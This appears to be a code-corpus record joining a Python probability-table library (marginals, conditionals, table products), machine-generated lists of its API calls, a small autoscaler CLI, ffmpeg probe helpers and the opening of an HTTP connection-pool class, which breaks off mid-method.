if len(names) != len(self._row_sample_):
raise ValueError("The length of column names and columns are not the same.")
super().__init__(key_values)
self.names = names
value_sample = super().__getitem__(self._row_sample_)
if isinstance(value_sample, Table):
self.columns = TableColumns(
names=names, children_names=value_sample.names, table=self
)
self.children_names = value_sample.names
else:
if _children_names_ is None:
self.children_names = []
self.columns = TableColumns(names=names, children_names=[], table=self)
else:
self.children_names = _children_names_
self.columns = TableColumns(
names=names, children_names=_children_names_, table=self
)
def __missing__(self, key):
return None
def __getitem__(self, args):
"""Override the dict by converting the
comma separated arguments to RowKey
"""
# This is faster than isinstance
# We are sure there is not any inheritance
# to deal with
if type(args) is RowKey:
return super().__getitem__(args)
if self.columns.size == 1:
key = self.columns.to_key(args)
else:
key = self.columns.to_key(*args)
return super().__getitem__(key)
def _check_keys_consistencies_(self):
# We suppose each column is positioned
# in a fix place of the n-tuple.
# Therefore, the levels of the column can be
# found by iterating over each tuple's item
# Convert each features line to tuple
first_row_types = [type(item) for item in self._row_sample_]
for row in self.keys():
# compair length
if len(row) != self.columns.size:
raise ValueError("The length of the 'factors' are not consistence.")
# compair row's elements type
comparisions = [
isinstance(element, type_1)
for element, type_1 in zip(row, first_row_types)
]
if not all(comparisions):
raise ValueError("The types of the 'factors' are not consistence.")
def to_2d_array(self):
"""Convert the distribution ( or the self._counter's
key:value) to a 2D numpy array where the array
rows are [[(RV_1, RV_2, ..., RV_n, count)],[...
Returns:
numpy ndarray:
A 2D numpy array that the its last column
is the counts.
"""
return np.array([k + (v,) for k, v in self.items()], dtype=np.object)
def _product_(self, right):
"""Multiply two Tables.
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a Table.")
# Find common variables
# reorder commons based on their order in left_common_indices
commons = [
name for name in self.names if name in (set(self.names) & set(right.names))
]
# When there is no common variable, it is just a simple product
if len(commons) == 0:
names = np.r_[self.names, right.names]
return (
{
k1 + k2: v1 * v2
for k1, v1 in self.items()
for k2, v2 in right.items()
},
names,
)
# In the case that there is one or more common variables,
# the operation is similar to SQL inner join
# So, create a lookup for the left table, by using the
# common variables as key.
left_common_indices = [
i for i, name in enumerate(self.names) if name in commons
]
# the order in right must be the same as the left
# so we reorder the indices base on its left order
right_common_indices = [
i
for name in commons
for i, name2 in enumerate(right.names)
if name == name2
]
right_complement_indices = [
i for i, name in enumerate(right.names) if name not in commons
]
# Methods to split the keys
def l_comm(key):
return tuple([key[i] for i in left_common_indices])
def r_comm(key):
return tuple([key[i] for i in right_common_indices])
def r_comp(key):
return tuple([key[i] for i in right_complement_indices])
# left and right tables lookup
# left : (key:value) == (common_key: (left_key, left_value))
left_lookup = {}
for k, value in self.items():
comm = l_comm(k)
if comm in left_lookup:
left_lookup[comm] += [(k, value)]
else:
left_lookup[comm] = [(k, value)]
# right : (key:value) == (common_key: (right_compliment_key, right_value))
right_lookup = {}
for k, value in right.items():
comm = r_comm(k)
if comm in right_lookup:
right_lookup[comm] += [(r_comp(k), value)]
else:
right_lookup[comm] = [(r_comp(k), value)]
# The inner join happens over keys of two dictionaries (left_lookup and
# right_lookup).
prodcut_dict = {}
for comm, l_values in left_lookup.items():
if comm not in right_lookup:
continue
for left_key, left_value in l_values:
for right_comp, right_value in right_lookup[comm]:
# prodcut_dict values must be multiplied.
# prodcut_dict keys are the combination: (left, right_compliment).
prodcut_dict[left_key + right_comp] = left_value * right_value
# names are the combination of [left_names, right_compelements_names]
combined_names = np.r_[
self.names,
[name for name in right.names if name not in commons],
]
return (prodcut_dict, combined_names)
def marginal(self, *args, normalise=True):
"""Marginal of (group by) the Table over a set of columns.
P(X, Y, Z) -> P(X, Y) or P(X, Z) or P(Y, Z)
Args:
args (list):
List of column names to marginalised.
Raises:
ValueError:
Raises when one of the column names is
not defined.
Or raises when requested for all column names.
Returns:
Table: (rows, names).
"""
# check the validity of operation based on column names
if len(args) == self.columns.size:
raise ValueError("Cannot marginalize on all column names.")
# split columns to indices and comp_indices
columns_info = self.columns.split_columns(*args)
#
# Convert the key:values to 2D numpy array
# the array rows are (row, value)
arr = self.to_2d_array()
# filter the compliment columns
filtered_arr = np.c_[arr[:, columns_info.complimnet_indices], arr[:, -1]]
# split the 2d array's rows to a tuple of
# compliment columns (row[comp_indices])
# and count row[-1]
arr_gen = ((RowKey(row[:-1]), row[-1]) for row in filtered_arr)
# Before calling the groupby, we have to sort the generator
# by the tuple of compliment columns (index zero in itemgetter)
sorted_arr = sorted(arr_gen, key=itemgetter(0))
# since the values in each 'group' are
# (compliment columns, value)
# here we group by 'compliment columns' and apply
# the sum on the value. Then the dictionary of
# compliment columns:op_of_values
# is an acceptable argument for Table
grouped_arr = {
k: sum([item[1] for item in g])
for k, g in groupby(sorted_arr, key=itemgetter(0))
}
table = Table(grouped_arr, columns_info.complimnet_names, _internal_=True)
if normalise:
table.normalise()
return table
def condition_on(self, *args, normalise=True):
"""Creates the conditional based on
the provided names of columns.
P(X, Y) -> P(X | Y) or P(Y | X)
Args:
args (list):
List of names of provided random
variables.
Raises:
ValueError:
If the provided RV names do not exist
in the distribution.
Returns:
MultiTable
"""
if self.columns.size == 1:
raise ValueError("This is a single column Table and cannot condition on.")
if len(args) == self.columns.size:
raise ValueError("Cannot condition on all columns.")
# split columns to indices and comp_indices
columns_info = self.columns.split_columns(*args)
# Convert the key:value to 2D numpy array
# the array rows are (rows, value)
arr = self.to_2d_array()
# divide the 2d array's rows to a tuple of columns,
# (row[indices]), compliment columns (row[comp_indices])
# and values row[-1]
arr_gen = (
(
RowKey(row[columns_info.indices]),
RowKey(row[columns_info.complimnet_indices]),
row[-1],
)
for row in arr
)
# Before calling the groupby, we have to sort the generator
# by the tuple of columns (index zero in itemgetter)
# And since later we will call the group by on group,
# for each key we do the inner sort too (index one in itemgetter)
sorted_arr = sorted(arr_gen, key=itemgetter(0, 1))
# This method convert a group to a dictionary
def make_dict(group):
# since the values in 'group' argument are
# (columns, compliment columns, value)
# here we group by 'compliment columns' and sum
# the values.
return {
k: sum([item[2] for item in g2])
for k, g2 in groupby(group, key=itemgetter(1))
}
# For each group (belongs a unique values), we create
# a dictionary in a dictionary comprehension
grouped_arr = {
k: make_dict(g) for k, g in groupby(sorted_arr, key=itemgetter(0))
}
# The above dictionary is dictionary of dictionaries
# # the first set of names is for parent dictionary
# and the second set is for children
table = MultiTable(
{
key: Table(values, columns_info.complimnet_names, _internal_=True)
for key, values in grouped_arr.items()
},
columns_info.indices_names,
)
if normalise:
table.normalise()
return table
def reduce(self, **kwargs):
"""Reduce the Table by one or more columns.
P(X, Y) -> P(X = x, Y) or P(X, Y = y)
Args:
kwargs (dict):
A dictionary that its 'key' is the name
of the column and its 'value'
is the value that must be reduced by.
Raises:
ValueError:
If the provided names do not exist in the Table.
Returns:
[Table]: A reduce Table.
"""
# split columns to indices and comp_indices
columns = list(kwargs.keys())
if len(columns) == self.columns.size:
raise ValueError("Cannot reduce on all column names.")
columns_info = self.columns.split_columns(*columns)
values = np.array([value for _, value in kwargs.items()], dtype=np.object)
#
# Convert the key:values to 2D numpy array
# the array rows are (keys, value)
arr_counter = self.to_2d_array()
# filter the 2d array rows by provided values of the reduce
# conditioned_arr is a boolean one, and filtering happens
# in the second line
conditioned_arr = np.all(arr_counter[:, columns_info.indices] == values, axis=1)
sliced_arr = arr_counter[conditioned_arr, :]
# filter the 2d array columns (the compliment columns)
# plus the value column (which is the last column)
sliced_arr = sliced_arr[:, columns_info.complimnet_indices + [-1]]
# divide the 2d array's rows to a tuple of columns
# and value
# So, we make a generator that divide the rows to the tuple of
# columns (tuple(row[:-1]) and value (row[-1])
arr_gen = ((RowKey(row[:-1]), row[-1]) for row in sliced_arr)
# Before calling the groupby, we have to sort the generator
# by the tuple of column (index zero in itemgetter)
sorted_slice_arr = sorted(arr_gen, key=itemgetter(0))
# group by the filtered columns (compliment
# columns) and sum the value per key
# Note that the 'itemgetter' read the first index which
# is the tuple of compliment columns
return Table(
{
k: sum([item[1] for item in g])
for k, g in groupby(sorted_slice_arr, key=itemgetter(0))
},
columns_info.complimnet_names,
_internal_=True,
)
def get(self, *args, **kwargs):
key = self.columns.to_key(*args, **kwargs)
return super().__getitem__(key)
def to_table(self, sort=False, value_title=""):
arr = self.to_2d_array().astype("U")
arr_len = np.apply_along_axis(lambda row: [len(item) for item in row], 0, arr)
max_levels_len = np.max(arr_len[:, :-1], axis=0)
max_freq_len = max(np.max(arr_len[:, -1]), len(value_title))
def padding(max_len):
def str_padding(value):
return "".join([" "] * (max_len - len(str(value))))
return str_padding
r_padding = padding(max_freq_len)
if sort: # sort by values
items = reversed(sorted(self.items(), key=lambda item: item[1]))
else: # sort by keys
items = sorted(self.items())
rows = ""
header = ""
horizontal_line = ""
for i, name in enumerate(self.names):
header += f"|{name}{padding(max_levels_len[i])(name)}"
horizontal_line += "|" + "".join(["-"] * max_levels_len[i])
header += "|" + "".join([" "] * max_freq_len) + "|"
horizontal_line += "|" + "".join(["-"] * max_freq_len) + "|"
for k, value in items:
key_str = ""
for i, k_part in enumerate(k):
key_str += f"|{padding(max_levels_len[i])(k_part)}{k_part}"
freq_padding = r_padding(value)
rows += f"{key_str}|{value}{freq_padding}|\n"
return f"{header}\n{horizontal_line}\n{rows}"
def add(self, that):
"""Combines two FrequencyTable and return
a new one. All the frequencies are sum together.
This is not a mathematical sum.
"""
#############################################
# check the validity of operation based on column names
if not isinstance(that, Table):
raise ValueError("Table can only adds to Table.")
if self.columns.size != that.columns.size:
raise ValueError("Two adding Table do not have the same columns.")
if len(self.children_names) != len(that.children_names):
raise ValueError("Two adding Table do not have the same children columns.")
for i, name in enumerate(self.names):
if name != that.names[i]:
raise ValueError(
"Two adding Table do not have the same columns "
"(order must be the same too)."
)
for i, name in enumerate(self.children_names):
if name != that.children_names[i]:
raise ValueError(
"Two adding Table do not have the same children columns "
"(order must be the same too)."
)
#############################################
# Algorithm
#
def add_internal(this, that, names):
if that is not None:
for key in that.keys():
if key in this:
this[key] += that[key]
else:
this[key] = that[key]
return Table(this, names=names, _internal_=True)
############################################
# MultiTable handeling
if self.columns.is_multitable():
return Table(
{
k: add_internal(table.copy(), that[k], self.children_names)
for k, table in self.items()
},
self.names,
_internal_=True,
)
return add_internal(self.copy(), that, self.names)
def total(self):
if self.columns.is_multitable():
return {k: table.total() for k, table in self.items()}
return sum(self.values())
def normalise(self):
if self.columns.is_multitable():
for k, total in self.total().items():
if total == 0:
continue
table = self[k]
for k2 in table:
table[k2] /= total
else:
total = self.total()
if total != 0:
for k in self.keys():
self[k] /= total
def __mul__(self, right):
"""Multiplies a table with this one.
P(X, Y) * k -> P(X, Y)
P(X) * P(Y, Z) -> P(X, Y, Z)
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
(rows, names) = self._product_(right)
return Table(rows, names, _internal_=True)
def __rmul__(self, left):
"""Multiplies a table with this one.
k * P(X, Y) -> P(X, Y)
P(X) * P(Y, Z) -> P(X, Y, Z)
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(left, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
(rows, names) = left._product_(self)
return Table(rows, names, _internal_=True)
def __add__(self, right):
return self.add(right)
def prod_right(table, key2, value2):
# Product a table with kay and value
if value2 is None:
return {}
return {key1 + key2: value1 * value2 for key1, value1 in table.items()}
def prod_left(table, key2, value2):
# Product a table with kay and value
if value2 is None:
return {}
return {key2 + key1: value1 * value2 for key1, value1 in table.items()}
def multi_table_to_table_product(left, right, all_ordered_names):
"""Multiply two tables.
P(X, Y | Z) * P(Z) -> P(X, Y, Z)
P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
"""
# Case P(X, Y | Z) * P(Z) -> P(X, Y, Z)
if list(left.names) == list(right.names):
return Table(
ChainMap(
*[
prod_right(table, key2=k, value2=right[k])
for k, table in left.items()
]
),
left.columns.children_names + left.names,
_internal_=True,
)
# Case P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
for name in right.names:
if not left.columns:
raise ValueError(
f"Column name '{name}'in right table is not defined on "
"conditioned columns of the left Table (name mismatched)."
)
# e.g. P(X, Y | Z, W) * P(Z) : indices of [W]
indices = [i for i, name in enumerate(left.names) if name not in right.names]
# e.g. P(X, Y | Z, W) * P(Z) : indices of [Z]
compliment_indices = [i for i in range(left.columns.size) if i not in indices]
# e.g. P(X, Y | Z, W) * P(Z) : [W]
reduced_names = [left.names[i] for i in indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {left.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to make a split key
return RowKey(*[key[i] for i in compliment_indices])
# Case: P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
if right.columns.size == len(indices):
return MultiTable(
ChainMap(
*[
prod_right(table, key2=k, value2=right[k])
for k, table in left.items()
]
),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(k): table * right.reduce(**reduced_key(k))
for k, table in left.items()
},
reduced_names,
_children_names_=children_names,
)
def table_to_multi_table_product(left, right, all_ordered_names):
"""Multiply two tables.
P(Z) * P(X, Y | Z) -> P(Z, X, Y)
P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
"""
# Case P(Z) * P(X, Y | Z) -> P(Z, X, Y)
if list(left.names) == list(right.names):
return Table(
ChainMap(
*[
prod_left(table, key2=k, value2=left[k])
for k, table in right.items()
]
),
right.names + right.columns.children_names,
_internal_=True,
)
# Case P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
for name in left.names:
if not right.columns:
raise ValueError(
f"Column name '{name}'in left table is not defined on "
"conditioned columns of the right Table (name mismatched)."
)
# e.g. P(Z) * P(X, Y | Z, W) : indices of [W]
indices = [i for i, name in enumerate(right.names) if name not in left.names]
# e.g. P(Z) * P(X, Y | Z, W) : indices of [Z]
compliment_indices = [i for i in range(right.columns.size) if i not in indices]
# e.g. P(Z) * P(X, Y | Z, W) : [W]
reduced_names = [right.names[i] for i in indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {right.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to make a split key
return RowKey(*[key[i] for i in compliment_indices])
# Case: P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
if left.columns.size == len(indices):
return MultiTable(
ChainMap(
*[
prod_left(table, key2=k, value2=left[k])
for k, table in right.items()
]
),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(k): table * left.reduce(**reduced_key(k))
for k, table in right.items()
},
reduced_names,
_children_names_=children_names,
)
def multi_table_to_multi_table_product(table_main, table_side, all_ordered_names):
indices = [
i for i, name in enumerate(table_main.names) if name not in table_side.names
]
compliment_indices = [i for i in range(table_main.columns.size) if i not in indices]
reduced_names = [table_main.names[i] for i in compliment_indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {table_main.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to split the keys
return RowKey(*[key[i] for i in compliment_indices])
if len(table_side.columns.children_names) == len(indices):
def prod2(key1, table1):
table_side_table2 = table_side[key1]
if table_side_table2 is None:
return {}
return {
compliment_key(key1): table1 * table2
for key2, table2 in table_side_table2
}
return MultiTable(
ChainMap(*[prod2(key1, table1) for key1, table1 in table_main.items()]),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(key1): table1 * table2
for key1, table1 in table_main.items()
for key2, table2 in table_side.reduce(**reduced_key(key1))
},
reduced_names,
_children_names_=children_names,
)
def multi_table_product(left, right):
"""Multiply two tables.
P(X, Y | Z) * P(Z) -> P(X, Y , Z)
P(X, Y | Z, W) * P(Z) -> P(X, Y , Z | W)
P(X, Y | Z, U) * P(Z | U) -> P(X, Y , Z | U)
P(X, Y | Z, U, W) * P(Z | U, W) -> P(X, Y , Z | U, W)
in the case of two conditionals, the longer one defines
the order of variables
e.g.
P(X, Y | Z, U, W) * P(Z | W, U) -> P(X, Y , Z | U, W)
P(Z | W, U) * P(X, Y | Z, U, W) -> P(X, Y , Z | U, W)
Args:
left ([type]): [description]
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
# Cases:
# P(X, Y | Z) * P(Z) -> P(X, Y, Z)
# P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
if not isinstance(right, MultiTable):
if sorted(right.names) != sorted(left.names):
raise ValueError("The right names is" " not equal to conditionals of left.")
all_ordered_names = left.columns.children_names + right.columns.names
return multi_table_to_table_product(left, right, all_ordered_names)
# Cases:
# P(Z) * P(X, Y | Z) -> P(Z, X, Y)
# P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
if not isinstance(left, MultiTable):
if sorted(right.names) != sorted(left.names):
raise ValueError("The left names is" " not equal to conditionals of right.")
all_ordered_names = left.names + right.columns.children_names
return table_to_multi_table_product(left, right, all_ordered_names)
# Cases:
# P(X, Y | Z, U) * P(Z | U) -> P(X, Y, Z | U)
# P(X, Y | Z, U, W) * P(Z | U, W) -> P(X, Y, Z | U, W)
# P(X, Y, Z| U, W) * P(U | W) -> P(X, Y, Z, U | W
# P(X, Y, Z| U, V, W) * P(U, V | W) -> P(X, Y, Z, U, V | W)
def in_the_other(first, second):
for name in first:
if name not in second:
return False
return True
common_conditions = [name for name in left.names if name in right.names]
right_compliment_conditions = [
name for name in right.names if name not in common_conditions
]
left_compliment_conditions = [
name for name in left.names if name not in common_conditions
]
# To check the crossed cases
# e.g. P(X | Y) * P(Y | X)
# after removing common names on conditionals,
# one of them must remains conditionless
# e.g.
# 1) P(X, Y | Z, U) * P(Z | U)
# removes commons: P(X, Y | Z) * P(Z)
# 2) P(Z | U, W) * P(X, Y | Z, U, W)
# removes commons: P(Z) * P(X, Y | Z)
# 3) P(X | Y) * P(Y | X)
# remove commons fails
if len(right_compliment_conditions) == 0:
if not in_the_other(right.columns.children_names, left.names):
raise ValueError(
"Columns in right is not defined in conditional names of left."
)
all_ordered_names = left.columns.children_names + right.columns.children_names
return multi_table_to_multi_table_product(left, right, all_ordered_names)
elif len(left_compliment_conditions) == 0:
if not in_the_other(left.columns.children_names, right.names):
raise ValueError(
"Columns in left is not defined in conditional names of right."
)
all_ordered_names = left.columns.children_names + right.columns.children_names
return multi_table_to_multi_table_product(right, left, all_ordered_names)
else:
raise ValueError("Columns and conditional names mismatch.")
class MultiTable(Table):
def __init__(self, rows, names=None, _children_names_=None):
super().__init__(
rows, names, _internal_=True, _children_names_=_children_names_
)
def marginal(self, *args, normalise=True):
"""[summary]
P(X, Y | Z) -> P(X | Z) or P(Y | Z)
Args:
normalise (bool, optional): [description]. Defaults to True.
Raises:
ValueError: [description]
Returns:
MultiTable: [description]
"""
for name in args:
if name in self.names:
raise ValueError(f"Cannot marginalize on conditioned columns:'{name}'.")
table = Table(
{
k: table.marginal(*args, normalise=normalise)
for k, table in self.items()
},
self.names,
_internal_=True,
)
if normalise:
table.normalise()
return table
def condition_on(self, *args, normalise=True):
"""Creates the conditional based on
the provided names of columns.
P(X, Y | Z) -> P(X | Y, Z) or P(Y | X, Z)
Args:
args (list):
List of names of provided random
variables.
Raises:
ValueError:
If the provided RV names do not exist
in the distribution.
Returns:
(row, names)
"""
for name in args:
if name in self.names:
raise ValueError(f"Cannot condition on conditioned columns:'{name}'.")
conditioned_children = (
(k, table.condition_on(*args, normalise=normalise))
for k, table in self.items()
)
return MultiTable(
{
key2 + key1: table
for key1, key2_table in conditioned_children
for key2, table in key2_table.items()
},
# It results in: P(X, Y | Z) -> P(X | Y, Z)
# inversing the order turns it P(X, Y | Z) -> P(X | Z, Y)
# Maybe more controls is needed here
list(args) + self.names,
)
def reduce(self, **kwargs):
"""Reduce the Table by one or more columns.
P(X, Y | Z) -> P(X = x, Y | Z) or P(X, Y = y | Z)
Args:
kwargs (dict):
A dictionary that its 'key' is the name
of the column and its 'value'
is the value that must be reduced by.
Raises:
ValueError:
If the provided names do not exist in the Table.
Returns:
[Table]: A reduce Table.
"""
return MultiTable(
{k: table.reduce(**kwargs) for k, table in self.items()},
self.names,
)
def __mul__(self, right):
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
return multi_table_product(self, right)
def __rmul__(self, left):
if not isinstance(left, Table):
raise ValueError("The 'left' argument must be a 'Table'.")
return multi_table_product(left, self)
| [
"probability.RowKey",
"numpy.max",
"operator.itemgetter",
"numpy.all",
"probability.TableColumns"
] | [((14467, 14529), 'numpy.all', 'np.all', (['(arr_counter[:, columns_info.indices] == values)'], {'axis': '(1)'}), '(arr_counter[:, columns_info.indices] == values, axis=1)\n', (14473, 14529), True, 'import numpy as np\n'), ((16044, 16075), 'numpy.max', 'np.max', (['arr_len[:, :-1]'], {'axis': '(0)'}), '(arr_len[:, :-1], axis=0)\n', (16050, 16075), True, 'import numpy as np\n'), ((23022, 23067), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (23028, 23067), False, 'from probability import RowKey\n'), ((25228, 25273), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (25234, 25273), False, 'from probability import RowKey\n'), ((26548, 26593), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (26554, 26593), False, 'from probability import RowKey\n'), ((2490, 2562), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': 'value_sample.names', 'table': 'self'}), '(names=names, children_names=value_sample.names, table=self)\n', (2502, 2562), False, 'from probability import TableColumns\n'), ((16104, 16126), 'numpy.max', 'np.max', (['arr_len[:, -1]'], {}), '(arr_len[:, -1])\n', (16110, 16126), True, 'import numpy as np\n'), ((2773, 2829), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '[]', 'table': 'self'}), '(names=names, children_names=[], table=self)\n', (2785, 2829), False, 'from probability import TableColumns\n'), ((2934, 3004), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '_children_names_', 'table': 'self'}), '(names=names, children_names=_children_names_, table=self)\n', (2946, 3004), False, 'from probability import TableColumns\n'), ((9663, 9679), 'probability.RowKey', 'RowKey', (['row[:-1]'], {}), '(row[:-1])\n', (9669, 9679), False, 'from probability import RowKey\n'), ((9896, 9909), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (9906, 9909), False, 'from operator import itemgetter\n'), ((11646, 11679), 'probability.RowKey', 'RowKey', (['row[columns_info.indices]'], {}), '(row[columns_info.indices])\n', (11652, 11679), False, 'from probability import RowKey\n'), ((11697, 11741), 'probability.RowKey', 'RowKey', (['row[columns_info.complimnet_indices]'], {}), '(row[columns_info.complimnet_indices])\n', (11703, 11741), False, 'from probability import RowKey\n'), ((12125, 12141), 'operator.itemgetter', 'itemgetter', (['(0)', '(1)'], {}), '(0, 1)\n', (12135, 12141), False, 'from operator import itemgetter\n'), ((15005, 15021), 'probability.RowKey', 'RowKey', (['row[:-1]'], {}), '(row[:-1])\n', (15011, 15021), False, 'from probability import RowKey\n'), ((15230, 15243), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (15240, 15243), False, 'from operator import itemgetter\n'), ((647, 672), 'operator.itemgetter', 'itemgetter', (['groupby_index'], {}), '(groupby_index)\n', (657, 672), False, 'from operator import itemgetter\n'), ((1300, 1356), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '[]', 'table': 'self'}), '(names=names, children_names=[], table=self)\n', (1312, 1356), False, 'from probability import TableColumns\n'), ((1519, 1589), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '_children_names_', 'table': 'self'}), '(names=names, children_names=_children_names_, table=self)\n', (1531, 1589), False, 'from probability import TableColumns\n'), ((1746, 1755), 'probability.RowKey', 'RowKey', (['k'], {}), '(k)\n', (1752, 1755), False, 'from probability import RowKey\n'), ((10313, 10326), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (10323, 10326), False, 'from operator import itemgetter\n'), ((12771, 12784), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (12781, 12784), False, 'from operator import itemgetter\n'), ((1870, 1879), 'probability.RowKey', 'RowKey', (['k'], {}), '(k)\n', (1876, 1879), False, 'from probability import RowKey\n'), ((12538, 12551), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (12548, 12551), False, 'from operator import itemgetter\n'), ((15593, 15606), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (15603, 15606), False, 'from operator import itemgetter\n')] |
#!/usr/bin/env python
import argparse
from autoscaler.client.sender import send_request_data
def main():
parser = argparse.ArgumentParser(
description='Send a timestamp to the autoscaler listener'
)
parser.add_argument(
'--host',
type=str,
default='127.0.0.1',
help='autoscaler host'
)
parser.add_argument(
'--port',
type=int,
default=8740,
help='autoscaler port'
)
args = parser.parse_args()
send_request_data(args.host, args.port)
if __name__ == '__main__':
main()
| [
"autoscaler.client.sender.send_request_data",
"argparse.ArgumentParser"
] | [((121, 208), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Send a timestamp to the autoscaler listener"""'}), "(description=\n 'Send a timestamp to the autoscaler listener')\n", (144, 208), False, 'import argparse\n'), ((501, 540), 'autoscaler.client.sender.send_request_data', 'send_request_data', (['args.host', 'args.port'], {}), '(args.host, args.port)\n', (518, 540), False, 'from autoscaler.client.sender import send_request_data\n')] |
import math
from ffmpeg import probe
def get_bitrate(video_path):
bitrate = probe(video_path)['format']['bit_rate']
return f'{math.trunc(int(bitrate) / 1000)} kbit/s'
def get_framerate_fraction(video_path):
r_frame_rate = [stream for stream in probe(video_path)['streams']
if stream['codec_type'] == 'video'][0][
'r_frame_rate']
return r_frame_rate
def get_framerate_float(video_path):
numerator, denominator = get_framerate_fraction(video_path).split('/')
return round((int(numerator) / int(denominator)), 3)
def get_duration(video_path):
return probe(video_path)['format']['duration']
def get_mbit_str(megabits):
return f'{megabits} Mbps'
def get_pretty_codec_name(codec):
dict = {
'h264': 'H.264 (AVC)',
'hevc': 'H.265 (HEVC)'
}
return dict.get(codec, codec)
| [
"ffmpeg.probe"
] | [((82, 99), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (87, 99), False, 'from ffmpeg import probe\n'), ((611, 628), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (616, 628), False, 'from ffmpeg import probe\n'), ((260, 277), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (265, 277), False, 'from ffmpeg import probe\n')] |
import time;
try: # mDebugOutput use is Optional
from mDebugOutput import ShowDebugOutput, fShowDebugOutput;
except ModuleNotFoundError as oException:
if oException.args[0] != "No module named 'mDebugOutput'":
raise;
ShowDebugOutput = fShowDebugOutput = lambda x: x; # NOP
from mMultiThreading import cLock, cWithCallbacks;
from mNotProvided import *;
from .cHTTPConnection import cHTTPConnection;
from .mExceptions import *;
# To turn access to data store in multiple variables into a single transaction, we will create locks.
# These locks should only ever be locked for a short time; if it is locked for too long, it is considered a "deadlock"
# bug, where "too long" is defined by the following value:
gnDeadlockTimeoutInSeconds = 1; # We're not doing anything time consuming, so this should suffice.
gu0DefaultMaxNumberOfConnectionsToServer = 10;
class cHTTPConnectionsToServerPool(cWithCallbacks):
@ShowDebugOutput
def __init__(oSelf,
oServerBaseURL,
u0zMaxNumberOfConnectionsToServer = zNotProvided,
o0SSLContext = None
):
oSelf.__oServerBaseURL = oServerBaseURL;
oSelf.__u0MaxNumberOfConnectionsToServer = fxGetFirstProvidedValue(u0zMaxNumberOfConnectionsToServer, gu0DefaultMaxNumberOfConnectionsToServer);
oSelf.__o0SSLContext = o0SSLContext;
oSelf.__oConnectionsPropertyLock = cLock(
"%s.__oConnectionsPropertyLock" % oSelf.__class__.__name__,
n0DeadlockTimeoutInSeconds = gnDeadlockTimeoutInSeconds
);
oSelf.__aoConnections = []; # The connections this pool can use itself
oSelf.__aoExternalizedConnections = []; # The connections this pool has provided for use by others.
oSelf.__uPendingConnects = 0;
oSelf.__bStopping = False;
oSelf.__oTerminatedPropertyLock = cLock(
"%s.__oTerminatedEventFiredLock" % oSelf.__class__.__name__,
n0DeadlockTimeoutInSeconds = gnDeadlockTimeoutInSeconds
);
oSelf.__oTerminatedLock = cLock(
"%s.__oTerminatedLock" % oSelf.__class__.__name__,
bLocked = True
);
oSelf.fAddEvents(
"hostname resolved",
"connect failed",
"new connection",
"bytes written", "bytes read",
"request sent", "response received",
"request sent and response received",
"connection terminated",
"terminated"
);
@property
def bTerminated(oSelf):
return not oSelf.__oTerminatedLock.bLocked;
@property
def uConnectionsCount(oSelf):
return len(oSelf.__aoConnections) + len(oSelf.__aoExternalizedConnections);
# @property
# def aoConnections(oSelf):
# oSelf.__oConnectionsPropertyLock.fAcquire();
# try:
# return oSelf.__aoConnections[:];
# finally:
# oSelf.__oConnectionsPropertyLock.fRelease();
@ShowDebugOutput
def __fReportTerminatedIfNoMoreConnectionsExist(oSelf):
assert oSelf.__bStopping, \
"This functions should not be called if we are not stopping!";
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
if oSelf.__aoConnections or oSelf.__aoExternalizedConnections:
# There are existing connections; termination will be reported when
# they all terminate too.
return;
oSelf.__oTerminatedPropertyLock.fAcquire();
try:
if not oSelf.__oTerminatedLock.bLocked: return; # Already terminated
# Yes, we have terminated and must release the lock
# and fire events.
